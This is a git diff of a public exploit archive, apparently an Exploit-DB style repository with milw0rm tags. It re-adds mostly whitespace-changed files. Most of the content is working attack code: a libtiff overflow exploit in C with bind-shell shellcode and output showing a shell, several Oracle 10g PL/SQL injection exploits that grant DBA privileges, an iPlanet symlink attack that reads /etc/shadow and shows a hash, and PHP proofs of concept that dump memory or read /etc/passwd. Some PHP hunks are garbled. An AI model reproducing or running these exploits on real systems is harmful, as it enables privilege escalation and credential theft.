+ gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff
+ Using RET: 0xbfffffb4
+ TIFFReadDirectory:
+ Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.
+ evil.tiff:
+ Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed.
+ evil.tiff:
+ Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
+ sh-3.00$
+
+ gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit
+ /usr/kde/3.3/bin/konqueror evil.tiff
+ Linux Enabled
+ Using RET: 0xbfffffb1
+ konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
+ konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
+ TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.
+ : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1);
+ tag
+ trimmed.
+ : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
+ sh-3.00$ exit
+ exit
+
+ Heheh it also works like a remote exploit i would leave that work (easy work) for the
+ "interested" people.
+
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define OFFSET 0x3F /* return address offset */
+#define SHELL_OFFSET 0x0102 /* shellcode address offset */
+#define DISPLAY "DISPLAY=:0.0" /* no comments ... */
+#define HOMEDIR "HOME=/tmp/"
+
+int
+main(int argc, char **argv, char **env)
+{
+ /* Linux shellcode that binds a shell on port 4369 */
+char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31"
+ "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52"
+ "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2"
+ "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89"
+ "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0"
+ "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31"
+ "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05"
+ "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
+ "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f"
+ "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
+ "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
+
+ /* (?) lies lies lies lies!*/
+ #ifdef FREEBSD
+ printf("FreeBSD Enabled\n");
+ char shellcode[]=
+ "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
+ "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";
+
+ #else
+ printf("Linux Enabled\n");
+ char shellcode[] =
+ "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c"
+ "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
+ "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd"
+ "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f"
+ "\x73\x68\x23";
+
+ #endif
+
+ if(argc < 3)
+ {
+ fprintf(stderr, "Error, arguments are like these\n"
+ "%s \n", argv[0]);
+ return -1;
+ }
+
+ char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};
+
+ /* argv[1] -> executable file that is linked with vuln tiff library */
+ long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;
+
+ int fd = open(argv[2], O_RDWR);
+ if(fd == -1)
+ {
+ perror("open()");
+ return -1;
+ }
+
+ if(lseek(fd, OFFSET, SEEK_SET) == -1)
+ {
+ perror("lseek()");
+ close(fd);
+ return -1;
+ }
+
+ if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long))
+ {
+ perror("write()");
+ close(fd);
+ return -1;
+ }
+
+ close(fd);
+
+ fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret);
+
+ if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1)
+ {
+ perror("execve()");
+ return -1;
+ }
+
+ return 0;
+}
+
+// milw0rm.com [2006-03-05]
diff --git a/platforms/multiple/local/1719.txt b/platforms/multiple/local/1719.txt
index a16dd963a..332925084 100755
--- a/platforms/multiple/local/1719.txt
+++ b/platforms/multiple/local/1719.txt
@@ -1,60 +1,60 @@
-/* 0day, description is wrong. /str0ke */
-
-/*
-* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
-*
-* Patch your database now!
-*
-* by N1V1Hd $3c41r3
-*
-*/
-
-CREATE OR REPLACE
-PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
-IS
-FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
-VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
-RETURN NUMBER;
-END;
-/
-
-CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
-IS
-FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
-VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
-RETURN NUMBER
-IS
-pragma autonomous_transaction;
-BEGIN
-EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
-COMMIT;
-RETURN(1);
-END;
-
-END;
-/
-
-DECLARE
-INDEX_NAME VARCHAR2(200);
-INDEX_SCHEMA VARCHAR2(200);
-TYPE_NAME VARCHAR2(200);
-TYPE_SCHEMA VARCHAR2(200);
-VERSION VARCHAR2(200);
-NEWBLOCK PLS_INTEGER;
-GMFLAGS NUMBER;
-v_Return VARCHAR2(200);
-BEGIN
-INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
-TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
-VERSION := '10.2.0.2.0'; GMFLAGS := 1;
-
-v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
-INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
-=> TYPE_NAME,
-TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
-NEWBLOCK, GMFLAGS => GMFLAGS
-);
-END;
-/
-
-// milw0rm.com [2006-04-26]
+/* 0day, description is wrong. /str0ke */
+
+/*
+* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
+*
+* Patch your database now!
+*
+* by N1V1Hd $3c41r3
+*
+*/
+
+CREATE OR REPLACE
+PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
+IS
+FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
+VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
+RETURN NUMBER;
+END;
+/
+
+CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
+IS
+FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
+VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
+RETURN NUMBER
+IS
+pragma autonomous_transaction;
+BEGIN
+EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
+COMMIT;
+RETURN(1);
+END;
+
+END;
+/
+
+DECLARE
+INDEX_NAME VARCHAR2(200);
+INDEX_SCHEMA VARCHAR2(200);
+TYPE_NAME VARCHAR2(200);
+TYPE_SCHEMA VARCHAR2(200);
+VERSION VARCHAR2(200);
+NEWBLOCK PLS_INTEGER;
+GMFLAGS NUMBER;
+v_Return VARCHAR2(200);
+BEGIN
+INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
+TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
+VERSION := '10.2.0.2.0'; GMFLAGS := 1;
+
+v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
+INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
+=> TYPE_NAME,
+TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
+NEWBLOCK, GMFLAGS => GMFLAGS
+);
+END;
+/
+
+// milw0rm.com [2006-04-26]
diff --git a/platforms/multiple/local/1924.txt b/platforms/multiple/local/1924.txt
index d47b61862..eca3c9074 100755
--- a/platforms/multiple/local/1924.txt
+++ b/platforms/multiple/local/1924.txt
@@ -1,56 +1,56 @@ -Date: 14 Jun 2006 -Vendor: Sun Microsystems, Inc. -Name: iPlanet Messaging Server -Version: 5.2 HotFix 1.16 (built May 14 2003) -Vuln: msg.conf symlink attack -Severity: high - - -Software description ----------------- -The iPlanet Messaging Server is a software product that provides a -centralized location for the exchange of information through the sending -and receiving of messages. The product is designed for -telecommunications providers, service providers, and enterprises that -offer messaging capabilities to employees, partners, and customers. The -iPlanet Messaging Server delivers a Web-based messaging platform capable -of serving tens of millions of users, and also provides value-added -differentiated services, including outsourcing, wireless ,and unified -messaging services. - - -Vulnerability desciption ----------------- -Setuid programs part of the iPlanet Messaging Server try to read the -configuration file msg.conf. -If the environment variable CONFIGROOT is set, the configuration is read -from that directory. -A symlink attack is possible, and as a result it is possible to read the -first line of any file with uid=0. - -Example ----------------- -test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version -iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) -libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) -SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris -test@sunbox:/tmp$ -test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master --rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master -test@sunbox:/tmp$ -test@sunbox:/tmp$ ln -s /etc/shadow msg.conf -test@sunbox:/tmp$ -test@sunbox:/tmp$ export CONFIGROOT=. 
-test@sunbox:/tmp$ -test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master -[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed by '='; line=root:qW1HFEa1MCD0w:11821:::::: ERROR: Configuration database initialization failed - see default logfile -test@sunbox:/tmp$ - -Vulnerable ----------------- -iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) - -php0t / zorro.hu -www.zorro.hu - -# milw0rm.com [2006-06-18] +Date: 14 Jun 2006 +Vendor: Sun Microsystems, Inc. +Name: iPlanet Messaging Server +Version: 5.2 HotFix 1.16 (built May 14 2003) +Vuln: msg.conf symlink attack +Severity: high + + +Software description +---------------- +The iPlanet Messaging Server is a software product that provides a +centralized location for the exchange of information through the sending +and receiving of messages. The product is designed for +telecommunications providers, service providers, and enterprises that +offer messaging capabilities to employees, partners, and customers. The +iPlanet Messaging Server delivers a Web-based messaging platform capable +of serving tens of millions of users, and also provides value-added +differentiated services, including outsourcing, wireless ,and unified +messaging services. + + +Vulnerability desciption +---------------- +Setuid programs part of the iPlanet Messaging Server try to read the +configuration file msg.conf. +If the environment variable CONFIGROOT is set, the configuration is read +from that directory. +A symlink attack is possible, and as a result it is possible to read the +first line of any file with uid=0. 
+ +Example +---------------- +test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version +iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) +libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) +SunOS sunbox 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris +test@sunbox:/tmp$ +test@sunbox:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master +-rws--s--x 1 root mail 446864 Sep 22 2005 /iplanet/iMS5/bin/msg/imta/bin/pipe_master +test@sunbox:/tmp$ +test@sunbox:/tmp$ ln -s /etc/shadow msg.conf +test@sunbox:/tmp$ +test@sunbox:/tmp$ export CONFIGROOT=. +test@sunbox:/tmp$ +test@sunbox:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master +[14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: func=_configdrv_file_readoption; error=option name should be followed by '='; line=root:qW1HFEa1MCD0w:11821:::::: ERROR: Configuration database initialization failed - see default logfile +test@sunbox:/tmp$ + +Vulnerable +---------------- +iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) + +php0t / zorro.hu +www.zorro.hu + +# milw0rm.com [2006-06-18] diff --git a/platforms/multiple/local/288.c b/platforms/multiple/local/288.c index 09f3a951d..426204543 100755 --- a/platforms/multiple/local/288.c +++ b/platforms/multiple/local/288.c @@ -108,6 +108,6 @@ int main(int argc, char *argv[]) return 0; } - - -// milw0rm.com [2001-03-04] + + +// milw0rm.com [2001-03-04] diff --git a/platforms/multiple/local/3177.txt b/platforms/multiple/local/3177.txt index 77d146e21..e6d4f5b75 100755 --- a/platforms/multiple/local/3177.txt +++ b/platforms/multiple/local/3177.txt 
@@ -1,46 +1,46 @@
-/**
-* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
-* Joxean Koret
-* Privileges needed:
-*
-* - CREATE SESSION
-*
-* Max. Length 97. Very, very cool
-*
-*/
-select *
-from user_role_privs
-;
-
-DECLARE
-SEQUENCE_OWNER VARCHAR2(200);
-SEQUENCE_NAME VARCHAR2(200);
-v_user_id number;
-v_commands VARCHAR2(32767);
-NEW_VALUE NUMBER;
-BEGIN
-SELECT user_id INTO v_user_id
-FROM user_users;
-
-v_commands := 'insert into sys.sysauth$ ' ||
-' values' ||
-'(' || v_user_id || ',4,' ||
-'999,null)';
-
-SEQUENCE_OWNER := 'TEST';
-SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
-end;--';
-NEW_VALUE := 1;
-SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
-SEQUENCE_OWNER => SEQUENCE_OWNER,
-SEQUENCE_NAME => SEQUENCE_NAME,
-NEW_VALUE => NEW_VALUE
-);
-END;
-/
-
-select *
-from user_role_privs
-;
-
-// milw0rm.com [2007-01-23]
+/**
+* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
+* Joxean Koret
+* Privileges needed:
+*
+* - CREATE SESSION
+*
+* Max. Length 97. Very, very cool
+*
+*/
+select *
+from user_role_privs
+;
+
+DECLARE
+SEQUENCE_OWNER VARCHAR2(200);
+SEQUENCE_NAME VARCHAR2(200);
+v_user_id number;
+v_commands VARCHAR2(32767);
+NEW_VALUE NUMBER;
+BEGIN
+SELECT user_id INTO v_user_id
+FROM user_users;
+
+v_commands := 'insert into sys.sysauth$ ' ||
+' values' ||
+'(' || v_user_id || ',4,' ||
+'999,null)';
+
+SEQUENCE_OWNER := 'TEST';
+SEQUENCE_NAME := ''',lockhandle=>:1);' || v_commands || ';commit;
+end;--';
+NEW_VALUE := 1;
+SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE(
+SEQUENCE_OWNER => SEQUENCE_OWNER,
+SEQUENCE_NAME => SEQUENCE_NAME,
+NEW_VALUE => NEW_VALUE
+);
+END;
+/
+
+select *
+from user_role_privs
+;
+
+// milw0rm.com [2007-01-23]
diff --git a/platforms/multiple/local/3178.txt b/platforms/multiple/local/3178.txt
index 2a9b5cfc6..7e7368bb8 100755
--- a/platforms/multiple/local/3178.txt
+++ b/platforms/multiple/local/3178.txt
@@ -1,42 +1,42 @@
-/**
-* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
-* Joxean Koret
-* Privileges needed:
-*
-* - CREATE SESSION
-* - CREATE PROCEDURE
-*
-*/
-select *
-from user_role_privs
-;
-
-CREATE OR REPLACE FUNCTION F1
-RETURN NUMBER AUTHID CURRENT_USER
-IS
-PRAGMA AUTONOMOUS_TRANSACTION;
-BEGIN
-EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
-COMMIT;
-RETURN(1);
-END;
-/
-
-DECLARE
-MASTER_NAME VARCHAR2(200);
-MASTER_OWNER VARCHAR2(200);
-BEGIN
-MASTER_NAME := ''' or ' || user || '.f1=1--';
-MASTER_OWNER := 'bla';
-SYS.KUPW$WORKER.MAIN(
-MASTER_NAME => MASTER_NAME,
-MASTER_OWNER => MASTER_OWNER
-);
-END;
-/
-
-select *
-from user_role_privs
-;
-
-// milw0rm.com [2007-01-23]
+/**
+* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
+* Joxean Koret
+* Privileges needed:
+*
+* - CREATE SESSION
+* - CREATE PROCEDURE
+*
+*/
+select *
+from user_role_privs
+;
+
+CREATE OR REPLACE FUNCTION F1
+RETURN NUMBER AUTHID CURRENT_USER
+IS
+PRAGMA AUTONOMOUS_TRANSACTION;
+BEGIN
+EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
+COMMIT;
+RETURN(1);
+END;
+/
+
+DECLARE
+MASTER_NAME VARCHAR2(200);
+MASTER_OWNER VARCHAR2(200);
+BEGIN
+MASTER_NAME := ''' or ' || user || '.f1=1--';
+MASTER_OWNER := 'bla';
+SYS.KUPW$WORKER.MAIN(
+MASTER_NAME => MASTER_NAME,
+MASTER_OWNER => MASTER_OWNER
+);
+END;
+/
+
+select *
+from user_role_privs
+;
+
+// milw0rm.com [2007-01-23]
diff --git a/platforms/multiple/local/3179.txt b/platforms/multiple/local/3179.txt
index 8cfb70225..d28c03923 100755
--- a/platforms/multiple/local/3179.txt
+++ b/platforms/multiple/local/3179.txt
@@ -1,42 +1,42 @@
-/**
-* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
-* Joxean Koret
-* Privileges needed:
-*
-* - EXECUTE_CATALOG_ROLE
-* - CREATE PROCEDURE
-*
-*/
-select *
-from user_role_privs
-;
-
-CREATE OR REPLACE FUNCTION F1
-RETURN NUMBER AUTHID CURRENT_USER
-IS
-PRAGMA AUTONOMOUS_TRANSACTION;
-BEGIN
-EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
-COMMIT;
-RETURN(1);
-END;
-/
-
-DECLARE
-USER_NAME VARCHAR2(200);
-JOB_NAME VARCHAR2(200);
-NEW_JOB BOOLEAN;
-v_Return NUMBER;
-BEGIN
-USER_NAME := 'OWNER';
-JOB_NAME := ''' OR ' || USER || '.f1() = 1--';
-
-v_Return := SYS.KUPV$FT.ATTACH_JOB(
-USER_NAME => USER_NAME,
-JOB_NAME => JOB_NAME,
-NEW_JOB => NEW_JOB
-);
-END;
-/
-
-// milw0rm.com [2007-01-23]
+/**
+* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
+* Joxean Koret
+* Privileges needed:
+*
+* - EXECUTE_CATALOG_ROLE
+* - CREATE PROCEDURE
+*
+*/
+select *
+from user_role_privs
+;
+
+CREATE OR REPLACE FUNCTION F1
+RETURN NUMBER AUTHID CURRENT_USER
+IS
+PRAGMA AUTONOMOUS_TRANSACTION;
+BEGIN
+EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
+COMMIT;
+RETURN(1);
+END;
+/
+
+DECLARE
+USER_NAME VARCHAR2(200);
+JOB_NAME VARCHAR2(200);
+NEW_JOB BOOLEAN;
+v_Return NUMBER;
+BEGIN
+USER_NAME := 'OWNER';
+JOB_NAME := ''' OR ' || USER || '.f1() = 1--';
+
+v_Return := SYS.KUPV$FT.ATTACH_JOB(
+USER_NAME => USER_NAME,
+JOB_NAME => JOB_NAME,
+NEW_JOB => NEW_JOB
+);
+END;
+/
+
+// milw0rm.com [2007-01-23]
diff --git a/platforms/multiple/local/321.c b/platforms/multiple/local/321.c
index 9de556b6e..9496ed389 100755
--- a/platforms/multiple/local/321.c
+++ b/platforms/multiple/local/321.c
@@ -58,6 +58,6 @@ main(int argc, char **argv)
 (void)alarm((u_int)0);
 execl(PATH_MOUNT, "umount", buff, NULL);
 }
-
-
-// milw0rm.com [1996-08-13]
+
+
+// milw0rm.com [1996-08-13]
diff --git a/platforms/multiple/local/3413.php b/platforms/multiple/local/3413.php
index 01cad354a..09c6d3a77 100755
--- a/platforms/multiple/local/3413.php
+++ b/platforms/multiple/local/3413.php
@@ -1,56 +1,56 @@ - 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } -?> - -# milw0rm.com [2007-03-04] + 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } +?> + +# milw0rm.com [2007-03-04] diff --git a/platforms/multiple/local/3414.php b/platforms/multiple/local/3414.php index 9e979f96b..c0ee677c6 100755 --- a/platforms/multiple/local/3414.php +++ b/platforms/multiple/local/3414.php @@ -1,49 +1,49 @@ -
A1"); - - $keys = array_keys($_SESSION); - $stackdump = $keys[1]; - - echo "Stackdump\n---------\n\n"; - - for ($b=0; $b 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } -?> - -# milw0rm.com [2007-03-04] +
A1"); + + $keys = array_keys($_SESSION); + $stackdump = $keys[1]; + + echo "Stackdump\n---------\n\n"; + + for ($b=0; $b 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } +?> + +# milw0rm.com [2007-03-04] diff --git a/platforms/multiple/local/3424.php b/platforms/multiple/local/3424.php index a9395fa2d..6fc797fc0 100755 --- a/platforms/multiple/local/3424.php +++ b/platforms/multiple/local/3424.php @@ -1,69 +1,69 @@ -= 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } - -?> - -# milw0rm.com [2007-03-07] += 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } + +?> + +# milw0rm.com [2007-03-07] diff --git a/platforms/multiple/local/3442.php b/platforms/multiple/local/3442.php index 4ca2bf10a..55a9fcc9d 100755 --- a/platforms/multiple/local/3442.php +++ b/platforms/multiple/local/3442.php @@ -1,86 +1,86 @@ - - -# milw0rm.com [2007-03-09] + + +# milw0rm.com [2007-03-09] diff --git a/platforms/multiple/local/3559.php b/platforms/multiple/local/3559.php index 2406dda09..3cb85c5d3 100755 --- a/platforms/multiple/local/3559.php +++ b/platforms/multiple/local/3559.php 
@@ -1,56 +1,56 @@ -1,str_repeat('"', 200)."2"=>1); - - $heapdump = unserialize($str); - - - - - echo "Heapdump\n---------\n\n"; - - $len = strlen($heapdump); - for ($b=0; $b<$len; $b+=16) { - printf("%08x: ", $b); - for ($i=0; $i<16; $i++) { - if ($b+$i<$len) { - printf ("%02x ", ord($heapdump[$b+$i])); - } else { - printf (".. "); - } - } - for ($i=0; $i<16; $i++) { - if ($b+$i<$len) { - $c = ord($heapdump[$b+$i]); - } else { - $c = 0; - } - if ($c > 127 || $c < 32) { - $c = ord("."); - } - printf ("%c", $c); - } - printf("\n"); - } -?> - -# milw0rm.com [2007-03-23] +1,str_repeat('"', 200)."2"=>1); + + $heapdump = unserialize($str); + + + + + echo "Heapdump\n---------\n\n"; + + $len = strlen($heapdump); + for ($b=0; $b<$len; $b+=16) { + printf("%08x: ", $b); + for ($i=0; $i<16; $i++) { + if ($b+$i<$len) { + printf ("%02x ", ord($heapdump[$b+$i])); + } else { + printf (".. "); + } + } + for ($i=0; $i<16; $i++) { + if ($b+$i<$len) { + $c = ord($heapdump[$b+$i]); + } else { + $c = 0; + } + if ($c > 127 || $c < 32) { + $c = ord("."); + } + printf ("%c", $c); + } + printf("\n"); + } +?> + +# milw0rm.com [2007-03-23] diff --git a/platforms/multiple/local/4392.txt b/platforms/multiple/local/4392.txt index c528052b4..5cd740636 100755 --- a/platforms/multiple/local/4392.txt +++ b/platforms/multiple/local/4392.txt 
@@ -1,80 +1,79 @@ - - -Affected Products: -<= PHP 5.2.3 -<= PHP 4.4.7 - -Authors: -Mattias Bengtsson -Philip Olausson - -Reported: -2007-06-05 - -Released: -2007-08-30 - -CVE: -CVE-2007-3997 - -Issue: - -A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction. - -Description: - -PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. - -Details: - -By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode. - -For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1); - -Proof Of Concepts: - -MySQL: - - - -MySQLi: - -options(MYSQLI_OPT_LOCAL_INFILE, 1); -$m->set_local_infile_handler("r"); -$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); -$m->close(); - -?> - -Impact: - -This issue could have major impact on shared hosting systems. - -Solution: - -Upgrade PHP to 5.2.4 or 4.4.8 - -# milw0rm.com [2007-09-10] + +Affected Products: +<= PHP 5.2.3 +<= PHP 4.4.7 + +Authors: +Mattias Bengtsson +Philip Olausson + +Reported: +2007-06-05 + +Released: +2007-08-30 + +CVE: +CVE-2007-3997 + +Issue: + +A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction. + +Description: + +PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. 
+ +Details: + +By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode. + +For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1); + +Proof Of Concepts: + +MySQL: + + + +MySQLi: + +options(MYSQLI_OPT_LOCAL_INFILE, 1); +$m->set_local_infile_handler("r"); +$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); +$m->close(); + +?> + +Impact: + +This issue could have major impact on shared hosting systems. + +Solution: + +Upgrade PHP to 5.2.4 or 4.4.8 + +# milw0rm.com [2007-09-10] diff --git a/platforms/multiple/local/4564.txt b/platforms/multiple/local/4564.txt index 25ad5edb9..138e805a8 100755 --- a/platforms/multiple/local/4564.txt +++ b/platforms/multiple/local/4564.txt 
@@ -1,69 +1,69 @@ -/******************************************************************/ -/******* Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit **********/ -/******************************************************************/ -/************ sploit grant DBA to unprivileged user ***************/ -/******************************************************************/ -/****************** BY Sh2kerR (Digital Security) ***************/ -/******************************************************************/ -/***************** tested on oracle 10.1.0.2.0 *******************/ -/******************************************************************/ -/******************************************************************/ -/* Date of Public EXPLOIT: October 23, 2007 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsec.ru */ -/******************************************************************/ -/* Original Advisory by: */ -/* David Litchfield [ davidl@ngssoftware.com ] */ -/* Reported: 6 June 2005 */ -/* Date of Public Advisory: October 17, 2007 */ -/* Advisory number: #NISR17102007A */ -/* */ -/******************************************************************/ - -select * from user_role_privs; - - -CREATE OR REPLACE FUNCTION HACKIT return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'grant dba to scott'; -COMMIT; -RETURN ''; -END; -/ - - -set serveroutput on - -create table mark_tab (id number primary key, text varchar2(80) ); - -insert into mark_tab values ('1', 'All your bases are belong to US'); - -create index mark_tab_idx on mark_tab(text) - indextype is ctxsys.context parameters - ('filter ctxsys.null_filter'); - - -SET SERVEROUTPUT ON; -DECLARE - mklob CLOB; - amt NUMBER := 40; - line VARCHAR2(80); - BEGIN - CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob); - DBMS_LOB.READ(mklob, amt, 1, line); - DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line); - 
DBMS_LOB.FREETEMPORARY(mklob); - END; - / - - -select * from user_role_privs; - -/******************************************************************/ -/*************************** SEE U LATER ;) ***********************/ -/******************************************************************/ - -// milw0rm.com [2007-10-23] +/******************************************************************/ +/******* Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit **********/ +/******************************************************************/ +/************ sploit grant DBA to unprivileged user ***************/ +/******************************************************************/ +/****************** BY Sh2kerR (Digital Security) ***************/ +/******************************************************************/ +/***************** tested on oracle 10.1.0.2.0 *******************/ +/******************************************************************/ +/******************************************************************/ +/* Date of Public EXPLOIT: October 23, 2007 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsec.ru */ +/******************************************************************/ +/* Original Advisory by: */ +/* David Litchfield [ davidl@ngssoftware.com ] */ +/* Reported: 6 June 2005 */ +/* Date of Public Advisory: October 17, 2007 */ +/* Advisory number: #NISR17102007A */ +/* */ +/******************************************************************/ + +select * from user_role_privs; + + +CREATE OR REPLACE FUNCTION HACKIT return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'grant dba to scott'; +COMMIT; +RETURN ''; +END; +/ + + +set serveroutput on + +create table mark_tab (id number primary key, text varchar2(80) ); + +insert into mark_tab values ('1', 'All your bases are belong to US'); + +create index mark_tab_idx on mark_tab(text) + indextype is ctxsys.context 
